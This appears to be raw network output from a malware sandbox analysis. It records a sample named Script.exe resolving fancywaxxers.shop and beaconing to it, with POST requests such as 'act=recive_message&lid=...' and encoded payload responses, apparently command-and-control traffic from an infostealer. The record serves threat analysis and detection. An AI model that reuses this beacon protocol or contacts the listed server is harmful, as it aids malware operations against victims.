Jan 5, 2025 19:09:03.635495901 CET	49722	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:03.635595083 CET	49722	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:03.635600090 CET	443	49722	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:04.109008074 CET	443	49722	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:04.109092951 CET	443	49722	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:04.109148979 CET	49722	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:04.122411013 CET	49722	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:04.122427940 CET	443	49722	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:04.555685997 CET	49723	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:04.555716991 CET	443	49723	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:04.555826902 CET	49723	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:04.556183100 CET	49723	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:04.556197882 CET	443	49723	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:05.014771938 CET	443	49723	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:05.014898062 CET	49723	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:05.016300917 CET	49723	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:05.016305923 CET	443	49723	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:05.016537905 CET	443	49723	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:05.017874002 CET	49723	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:05.018624067 CET	49723	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:05.018659115 CET	443	49723	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:05.018762112 CET	49723	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:05.018800020 CET	443	49723	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:05.018920898 CET	49723	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:05.018974066 CET	443	49723	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:05.019119024 CET	49723	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:05.019150019 CET	443	49723	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:05.019299984 CET	49723	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:05.019340038 CET	443	49723	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:05.019504070 CET	49723	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:05.019534111 CET	443	49723	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:05.019543886 CET	49723	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:05.019556046 CET	443	49723	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:05.019707918 CET	49723	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:05.019736052 CET	443	49723	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:05.019758940 CET	49723	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:05.019886971 CET	49723	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:05.019920111 CET	49723	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:05.028783083 CET	443	49723	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:05.028999090 CET	49723	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:05.029027939 CET	443	49723	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:05.029052019 CET	49723	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:05.029068947 CET	443	49723	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:05.029109955 CET	49723	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:05.033627987 CET	443	49723	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:06.628604889 CET	443	49723	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:06.628699064 CET	443	49723	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:06.628751040 CET	49723	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:06.631004095 CET	49723	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:06.631009102 CET	443	49723	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:06.648047924 CET	49724	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:06.648067951 CET	443	49724	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:06.648148060 CET	49724	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:06.655459881 CET	49724	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:06.655472994 CET	443	49724	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:07.124397993 CET	443	49724	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:07.124495029 CET	49724	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:07.125849009 CET	49724	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:07.125854969 CET	443	49724	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:07.126080990 CET	443	49724	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:07.127347946 CET	49724	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:07.127382040 CET	49724	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:07.127429008 CET	443	49724	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:07.853856087 CET	443	49724	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:07.853912115 CET	443	49724	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:07.853945971 CET	443	49724	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:07.853965044 CET	49724	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:07.853976011 CET	443	49724	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:07.854023933 CET	443	49724	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:07.854027033 CET	49724	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:07.854037046 CET	443	49724	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:07.854084015 CET	49724	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:07.854422092 CET	443	49724	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:07.854779959 CET	443	49724	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:07.854816914 CET	443	49724	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:07.854820967 CET	49724	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:07.854830027 CET	443	49724	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:07.854880095 CET	49724	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:07.858580112 CET	443	49724	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:07.858639002 CET	443	49724	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:07.858724117 CET	443	49724	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:07.858802080 CET	49724	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:07.858855009 CET	49724	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:07.859077930 CET	49724	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:07.859086990 CET	443	49724	104.21.80.1	192.168.2.5
Jan 5, 2025 19:09:07.859113932 CET	49724	443	192.168.2.5	104.21.80.1
Jan 5, 2025 19:09:07.859118938 CET	443	49724	104.21.80.1	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 5, 2025 19:08:56.657541037 CET	50187	53	192.168.2.5	1.1.1.1
Jan 5, 2025 19:08:56.670697927 CET	53	50187	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 5, 2025 19:08:56.657541037 CET	192.168.2.5	1.1.1.1	0x9906	Standard query (0)	fancywaxxers.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 5, 2025 19:08:56.670697927 CET	1.1.1.1	192.168.2.5	0x9906	No error (0)	fancywaxxers.shop	104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 5, 2025 19:08:56.670697927 CET	1.1.1.1	192.168.2.5	0x9906	No error (0)	fancywaxxers.shop	104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 5, 2025 19:08:56.670697927 CET	1.1.1.1	192.168.2.5	0x9906	No error (0)	fancywaxxers.shop	104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 5, 2025 19:08:56.670697927 CET	1.1.1.1	192.168.2.5	0x9906	No error (0)	fancywaxxers.shop	104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 5, 2025 19:08:56.670697927 CET	1.1.1.1	192.168.2.5	0x9906	No error (0)	fancywaxxers.shop	104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 5, 2025 19:08:56.670697927 CET	1.1.1.1	192.168.2.5	0x9906	No error (0)	fancywaxxers.shop	104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 5, 2025 19:08:56.670697927 CET	1.1.1.1	192.168.2.5	0x9906	No error (0)	fancywaxxers.shop	104.21.32.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

fancywaxxers.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49715	104.21.80.1	443	1480	C:\Users\user\Desktop\Script.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:08:57 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: fancywaxxers.shop
2025-01-05 18:08:57 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-05 18:08:57 UTC	1125	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:08:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1p86rgebomrl9j2hphqfog4bl0; expires=Thu, 01 May 2025 11:55:36 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XTbMp11YWSBZJq%2Fq2eOBo3rxMRg9Rocpgh6tHuiRRkhEOIpJ8njY6kN0KI8bSYvMTewluWLlZMnTg7wntyWGxkB1L8ivWOLrxbASzqK3z94G43lhnz9cqsWtl74I8jzHdGYR3A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd56aa62a907d0e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2005&min_rtt=2003&rtt_var=753&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=908&delivery_rate=1457813&cwnd=244&unsent_bytes=0&cid=bb211a6e54061fbe&ts=562&x=0"
2025-01-05 18:08:57 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-05 18:08:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49717	104.21.80.1	443	1480	C:\Users\user\Desktop\Script.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:08:58 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 52 Host: fancywaxxers.shop
2025-01-05 18:08:58 UTC	52	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 33 33 31 38 30 31 32 39 38 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--6331801298&j=
2025-01-05 18:08:58 UTC	1135	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:08:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6d2vtupua1g8egc3ullbh4j4or; expires=Thu, 01 May 2025 11:55:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WiP6eaq8rR4XzvTM4mcAefuY4rlmX1eSS%2BVsWjwQnSW4HmLjxomaHmHPxMNuCyt2LZfzyGIiM%2Fo3%2FQP5dhRqky8Wav%2BZoQ%2BoMIND8LH%2BVamTa9hpYlJo6ug1FjtOdpIPstWo7w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd56aac4c767d0e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1896&min_rtt=1889&rtt_var=723&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=953&delivery_rate=1498973&cwnd=244&unsent_bytes=0&cid=9cbf797a3eaf9654&ts=493&x=0"
2025-01-05 18:08:58 UTC	234	IN	Data Raw: 31 34 38 36 0d 0a 41 4a 4f 4c 6d 4e 45 72 41 49 77 6c 49 39 31 6f 53 78 39 45 65 6f 4a 45 45 34 5a 49 2b 4b 50 50 6d 4e 54 42 4f 37 70 2b 2f 75 4a 37 73 66 32 36 36 78 38 73 72 6c 5a 47 2f 31 49 2f 62 54 45 66 72 6d 5a 79 34 6d 72 43 78 61 37 30 70 36 51 58 6d 41 69 54 77 44 72 31 36 76 53 69 54 69 79 75 51 46 76 2f 55 68 42 6b 5a 68 2f 73 5a 69 6d 6b 4c 5a 4c 42 72 76 53 32 6f 46 44 56 44 70 4b 42 61 50 2f 73 38 4c 52 49 5a 4f 31 4a 54 72 67 4e 4c 6e 34 75 46 4f 73 70 65 2b 74 71 31 49 47 71 34 76 62 37 47 66 63 62 69 6f 4e 4e 38 76 6a 7a 38 31 59 73 39 77 64 47 73 30 70 78 50 53 55 66 34 43 68 31 34 69 4f 51 79 36 66 38 74 36 56 52 79 68 65 59 69 6d 6a 78 37 2f 47 2b 51 58 44 67 51 30 6d 7a Data Ascii: 1486AJOLmNErAIwlI91oSx9EeoJEE4ZI+KPPmNTBO7p+/uJ7sf266x8srlZG/1I/bTEfrmZy4mrCxa70p6QXmAiTwDr16vSiTiyuQFv/UhBkZh/sZimkLZLBrvS2oFDVDpKBaP/s8LRIZO1JTrgNLn4uFOspe+tq1IGq4vb7GfcbioNN8vjz81Ys9wdGs0pxPSUf4Ch14iOQy6f8t6VRyheYimjx7/G+QXDgQ0mz
2025-01-05 18:08:58 UTC	1369	IN	Data Raw: 43 79 52 2b 5a 6c 61 67 49 57 6d 6b 63 74 71 53 6e 2f 6d 6e 73 6b 7a 56 44 4a 72 41 66 62 2f 77 75 72 52 46 49 72 59 48 53 62 4d 45 4c 48 34 70 48 2b 45 6d 59 2b 73 71 6d 63 6d 6c 2f 72 79 73 56 74 63 53 6c 6f 64 71 2b 4f 37 31 74 45 46 6b 34 55 51 42 38 55 6f 75 5a 57 5a 41 6f 41 5a 68 35 79 6d 4f 7a 4c 79 36 71 65 31 41 6d 42 75 51 77 44 71 78 37 2f 53 79 52 47 4c 38 54 30 71 30 44 7a 74 32 4c 78 58 74 4a 6e 7a 75 4a 5a 6e 42 71 76 43 38 72 46 50 63 45 5a 47 47 59 76 47 70 74 50 4e 4f 65 71 34 66 41 5a 77 50 4f 58 6f 71 44 71 49 63 4d 66 74 6b 67 34 47 71 39 76 62 37 47 64 41 5a 6e 34 4e 70 2f 75 72 79 75 46 74 69 2f 45 46 4d 75 68 67 76 65 43 67 53 34 7a 52 37 36 69 79 5a 79 4b 62 7a 73 36 52 64 6d 46 4c 63 68 33 71 78 73 62 71 53 52 47 6e 69 54 56 61 Data Ascii: CyR+ZlagIWmkctqSn/mnskzVDJrAfb/wurRFIrYHSbMELH4pH+EmY+sqmcml/rysVtcSlodq+O71tEFk4UQB8UouZWZAoAZh5ymOzLy6qe1AmBuQwDqx7/SyRGL8T0q0Dzt2LxXtJnzuJZnBqvC8rFPcEZGGYvGptPNOeq4fAZwPOXoqDqIcMftkg4Gq9vb7GdAZn4Np/uryuFti/EFMuhgveCgS4zR76iyZyKbzs6RdmFLch3qxsbqSRGniTVa
2025-01-05 18:08:58 UTC	1369	IN	Data Raw: 7a 51 59 37 44 52 39 37 69 79 56 7a 4b 47 36 2b 4f 4e 65 77 46 7a 45 77 45 6a 79 2f 66 6d 35 43 31 66 74 53 55 2b 34 48 47 6c 69 61 41 47 67 49 58 32 6b 63 74 72 4d 72 50 4b 77 73 56 62 56 48 35 4b 4f 62 66 54 6d 38 72 4e 4a 62 2b 74 44 53 72 51 4a 4a 48 6b 30 45 75 41 75 64 4f 55 67 6b 49 48 6a 75 72 47 37 47 59 42 63 72 5a 64 70 73 39 7a 35 76 55 64 6c 2b 41 64 65 38 52 4e 70 65 69 70 59 75 47 5a 38 37 43 2b 66 7a 71 7a 77 75 4b 5a 54 31 42 53 53 67 33 44 2b 37 66 71 2f 51 57 6a 6a 53 55 57 33 41 79 4a 32 49 42 6a 68 4c 44 47 71 61 70 33 5a 37 61 4c 32 6c 31 37 55 45 5a 50 43 56 2f 4c 6e 39 4c 52 66 49 76 45 4a 57 50 38 4e 4a 54 31 2b 57 4f 77 76 63 65 38 67 6e 73 47 71 39 37 4f 67 58 74 73 52 6d 34 70 73 39 75 33 32 75 6b 52 6b 37 6b 42 46 75 68 67 73 Data Ascii: zQY7DR97iyVzKG6+ONewFzEwEjy/fm5C1ftSU+4HGliaAGgIX2kctrMrPKwsVbVH5KObfTm8rNJb+tDSrQJJHk0EuAudOUgkIHjurG7GYBcrZdps9z5vUdl+Ade8RNpeipYuGZ87C+fzqzwuKZT1BSSg3D+7fq/QWjjSUW3AyJ2IBjhLDGqap3Z7aL2l17UEZPCV/Ln9LRfIvEJWP8NJT1+WOwvce8gnsGq97OgXtsRm4ps9u32ukRk7kBFuhgs
2025-01-05 18:08:58 UTC	1369	IN	Data Raw: 73 54 66 2f 4a 71 68 59 2b 30 75 72 47 76 47 59 42 63 6c 59 6c 77 2f 2b 66 7a 76 6b 39 71 36 55 6c 4d 74 41 77 69 65 69 45 65 37 53 35 38 34 53 6d 62 78 61 66 6f 74 61 68 54 31 52 62 63 7a 69 4c 32 38 62 72 72 43 55 58 69 62 6c 47 6b 47 44 38 39 4f 56 62 35 5a 6e 62 6f 61 73 4b 42 72 76 57 2f 72 46 48 51 45 35 4f 45 62 50 66 76 39 37 5a 47 61 50 78 50 54 37 49 42 4a 6e 59 30 47 4f 30 69 66 65 41 69 6b 63 76 74 74 50 61 6b 51 5a 68 45 33 4c 56 76 2f 75 6e 35 70 51 6c 39 6f 46 34 42 75 41 5a 70 4a 57 59 55 37 69 5a 2b 36 43 61 52 79 61 7a 32 75 4b 52 63 30 52 53 55 6b 6d 50 31 34 66 75 39 52 6d 50 71 51 6b 53 37 44 53 31 37 4b 56 69 75 5a 6e 62 38 61 73 4b 42 67 74 32 44 34 58 6a 69 58 49 50 4f 65 37 48 75 39 76 4d 52 49 75 4a 45 54 62 63 46 4c 33 51 71 45 Data Ascii: sTf/JqhY+0urGvGYBclYlw/+fzvk9q6UlMtAwieiEe7S584SmbxafotahT1RbcziL28brrCUXiblGkGD89OVb5ZnboasKBrvW/rFHQE5OEbPfv97ZGaPxPT7IBJnY0GO0ifeAikcvttPakQZhE3LVv/un5pQl9oF4BuAZpJWYU7iZ+6CaRyaz2uKRc0RSUkmP14fu9RmPqQkS7DS17KViuZnb8asKBgt2D4XjiXIPOe7Hu9vMRIuJETbcFL3QqE
2025-01-05 18:08:58 UTC	921	IN	Data Raw: 75 49 5a 37 43 71 66 2b 35 6f 6c 6a 65 44 70 75 4a 63 50 2f 6b 39 62 74 42 61 2b 39 44 52 4c 49 4d 4a 58 63 6e 48 2b 34 6f 65 61 52 6b 32 73 61 31 75 75 37 6a 65 4d 67 48 6a 70 5a 76 30 4f 54 31 38 31 59 73 39 77 64 47 73 30 70 78 50 53 38 4b 35 43 74 6a 37 53 32 55 7a 71 37 6f 74 36 35 53 79 68 75 54 68 47 58 39 37 2f 57 31 53 47 66 6b 53 30 61 36 41 53 5a 78 5a 6c 61 67 49 57 6d 6b 63 74 72 76 70 75 6d 68 6f 46 66 54 43 6f 66 41 66 62 2f 77 75 72 52 46 49 72 59 48 51 72 51 42 4c 58 30 71 47 4f 51 72 63 66 59 6c 6e 63 61 6b 38 61 53 70 58 74 38 58 6c 49 74 74 39 2f 76 32 76 56 74 6e 2f 46 55 42 38 55 6f 75 5a 57 5a 41 6f 42 42 32 39 44 71 5a 67 35 7a 73 74 62 56 53 31 52 44 63 6e 79 7a 6f 71 66 32 2f 43 54 71 75 51 55 36 32 43 53 5a 38 4c 78 54 74 49 33 Data Ascii: uIZ7Cqf+5oljeDpuJcP/k9btBa+9DRLIMJXcnH+4oeaRk2sa1uu7jeMgHjpZv0OT181Ys9wdGs0pxPS8K5Ctj7S2Uzq7ot65SyhuThGX97/W1SGfkS0a6ASZxZlagIWmkctrvpumhoFfTCofAfb/wurRFIrYHQrQBLX0qGOQrcfYlncak8aSpXt8XlItt9/v2vVtn/FUB8UouZWZAoBB29DqZg5zstbVS1RDcnyzoqf2/CTquQU62CSZ8LxTtI3
2025-01-05 18:08:58 UTC	1369	IN	Data Raw: 33 35 30 65 0d 0a 64 4b 61 2b 31 41 53 4c 6b 42 4b 6e 63 70 48 2b 59 69 63 65 38 74 6c 4d 65 6f 38 62 2f 6a 46 35 67 62 68 4d 41 36 73 63 2f 5a 6f 56 74 51 34 45 52 61 2f 78 56 6e 5a 47 59 66 37 47 59 70 70 43 47 53 7a 72 2f 2f 76 36 74 64 30 52 79 59 69 6d 2f 32 36 66 2b 2b 54 47 62 67 51 30 61 2f 42 69 5a 36 4c 68 66 6b 4a 6e 36 6b 5a 4e 72 47 74 62 72 75 34 33 6e 54 43 72 32 4f 61 65 4f 70 35 66 31 51 49 75 6c 4c 41 65 64 4b 4a 33 51 6e 45 4f 34 71 65 65 41 34 6d 73 71 6b 39 62 65 73 57 64 73 64 6c 6f 68 77 39 2b 6e 78 75 30 35 71 36 6b 6c 54 76 67 56 70 4d 32 59 66 2b 47 59 70 70 42 75 4d 78 71 72 31 39 49 70 65 77 78 32 57 67 32 6e 39 71 65 58 39 55 43 4c 70 53 77 48 6e 53 69 52 78 4b 78 7a 79 4b 6e 48 6b 49 35 33 4c 76 2f 57 35 72 6c 72 59 47 59 36 Data Ascii: 350edKa+1ASLkBKncpH+Yice8tlMeo8b/jF5gbhMA6sc/ZoVtQ4ERa/xVnZGYf7GYppCGSzr//v6td0RyYim/26f++TGbgQ0a/BiZ6LhfkJn6kZNrGtbru43nTCr2OaeOp5f1QIulLAedKJ3QnEO4qeeA4msqk9besWdsdlohw9+nxu05q6klTvgVpM2Yf+GYppBuMxqr19Ipewx2Wg2n9qeX9UCLpSwHnSiRxKxzyKnHkI53Lv/W5rlrYGY6
2025-01-05 18:08:58 UTC	1369	IN	Data Raw: 2f 61 79 54 6d 58 6c 56 55 71 74 41 53 46 2b 4b 42 44 70 4a 6e 2f 6b 4b 35 66 42 37 62 54 32 70 45 47 59 52 4e 79 6c 51 65 62 2f 38 50 46 71 64 66 68 4e 52 72 4d 63 49 6e 77 6c 44 75 30 32 4d 61 70 71 69 38 61 38 75 75 36 31 53 63 38 62 67 38 35 37 73 65 37 32 38 78 45 69 35 55 68 50 73 67 45 74 64 43 4d 51 34 79 4e 30 37 69 61 57 77 4b 58 7a 76 4b 5a 63 33 68 61 66 6a 6d 33 77 35 66 36 36 52 32 75 75 43 51 47 34 45 6d 6b 6c 5a 69 37 77 49 57 6e 70 4f 74 6a 7a 72 75 75 6e 74 6c 54 49 47 74 36 76 59 66 33 71 2f 37 52 5a 49 76 45 4a 57 50 38 4e 4a 54 31 2b 57 4f 41 69 66 65 63 74 6c 4d 36 67 39 62 47 6f 56 74 49 53 6a 6f 39 6e 2b 65 58 79 76 6c 74 6f 35 46 56 49 74 67 63 6e 64 54 51 62 6f 47 67 78 34 7a 4c 61 6d 65 33 49 76 4b 42 56 7a 68 47 54 77 48 32 2f Data Ascii: /ayTmXlVUqtASF+KBDpJn/kK5fB7bT2pEGYRNylQeb/8PFqdfhNRrMcInwlDu02Mapqi8a8uu61Sc8bg857se728xEi5UhPsgEtdCMQ4yN07iaWwKXzvKZc3hafjm3w5f66R2uuCQG4EmklZi7wIWnpOtjzruuntlTIGt6vYf3q/7RZIvEJWP8NJT1+WOAifectlM6g9bGoVtISjo9n+eXyvlto5FVItgcndTQboGgx4zLame3IvKBVzhGTwH2/
2025-01-05 18:08:58 UTC	1369	IN	Data Raw: 64 73 36 56 46 51 38 69 73 6b 64 69 6f 56 37 79 30 78 71 6d 71 63 67 66 57 71 2b 4f 4e 64 79 56 7a 45 30 44 43 71 76 4b 6e 6b 47 54 44 78 43 56 6a 2f 48 47 6b 6c 64 46 61 67 4e 44 47 38 61 74 33 43 76 2b 69 77 6f 45 2f 62 57 36 4b 2b 51 65 62 2f 38 4b 67 4c 52 4f 6c 57 53 4b 6b 48 4f 30 4d 59 4e 75 30 6e 63 75 70 6f 71 39 65 67 36 72 57 6d 58 75 59 69 6b 6f 64 32 39 75 66 38 73 77 6b 73 72 6b 67 42 35 7a 4e 70 4e 57 59 6e 72 6d 5a 70 70 48 4c 61 39 4b 37 30 75 4b 52 50 79 56 47 2f 6c 33 54 37 38 72 69 56 54 6e 50 6e 55 55 79 74 53 6d 63 39 49 46 69 34 64 6a 2b 6b 4c 6f 75 42 39 61 72 6b 2b 41 79 4c 53 38 7a 53 66 62 2f 77 75 71 55 4a 4f 72 77 4a 41 61 31 4b 63 54 31 68 47 2f 49 30 64 2b 63 38 6d 59 61 54 78 4a 61 6f 54 39 6b 52 6c 34 78 63 7a 2f 7a 35 76 Data Ascii: ds6VFQ8iskdioV7y0xqmqcgfWq+ONdyVzE0DCqvKnkGTDxCVj/HGkldFagNDG8at3Cv+iwoE/bW6K+Qeb/8KgLROlWSKkHO0MYNu0ncupoq9eg6rWmXuYikod29uf8swksrkgB5zNpNWYnrmZppHLa9K70uKRPyVG/l3T78riVTnPnUUytSmc9IFi4dj+kLouB9ark+AyLS8zSfb/wuqUJOrwJAa1KcT1hG/I0d+c8mYaTxJaoT9kRl4xcz/z5v
2025-01-05 18:08:58 UTC	1369	IN	Data Raw: 65 41 61 6c 4b 63 53 39 6f 57 50 4a 6d 4b 61 52 74 6d 64 4f 2f 2f 4c 57 31 57 70 38 69 6f 72 56 68 2f 2b 66 39 70 58 78 68 2f 30 52 42 74 44 51 58 58 43 67 54 35 79 70 6e 32 68 53 76 77 71 50 30 73 62 56 49 6d 46 4c 63 6a 79 4b 70 30 4c 72 37 43 56 32 67 42 31 6e 2f 55 6d 6c 49 4a 52 62 75 49 57 66 31 5a 36 2f 43 76 50 6d 32 71 42 6d 57 58 4a 72 41 4f 71 4f 6e 75 72 64 59 49 72 59 58 45 2b 52 66 65 69 70 32 53 76 39 6f 61 4b 51 38 32 70 6e 2f 74 50 61 78 47 59 42 63 32 34 4e 77 34 2b 2f 35 70 55 6f 6c 30 48 6c 6e 76 41 30 76 66 69 67 50 38 57 52 65 35 79 47 57 7a 61 72 73 69 4a 31 4d 32 78 4b 53 68 33 54 67 71 62 54 7a 52 69 4b 32 66 67 47 75 41 43 34 78 62 6c 54 78 4e 58 2f 76 50 4a 32 42 6b 72 54 32 75 78 6d 41 58 4b 6d 44 62 50 2f 75 37 4b 49 45 52 4f Data Ascii: eAalKcS9oWPJmKaRtmdO//LW1Wp8iorVh/+f9pXxh/0RBtDQXXCgT5ypn2hSvwqP0sbVImFLcjyKp0Lr7CV2gB1n/UmlIJRbuIWf1Z6/CvPm2qBmWXJrAOqOnurdYIrYXE+Rfeip2Sv9oaKQ82pn/tPaxGYBc24Nw4+/5pUol0HlnvA0vfigP8WRe5yGWzarsiJ1M2xKSh3TgqbTzRiK2fgGuAC4xblTxNX/vPJ2BkrT2uxmAXKmDbP/u7KIERO

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49719	104.21.80.1	443	1480	C:\Users\user\Desktop\Script.exe

Timestamp	Bytes transferred	Direction	Data
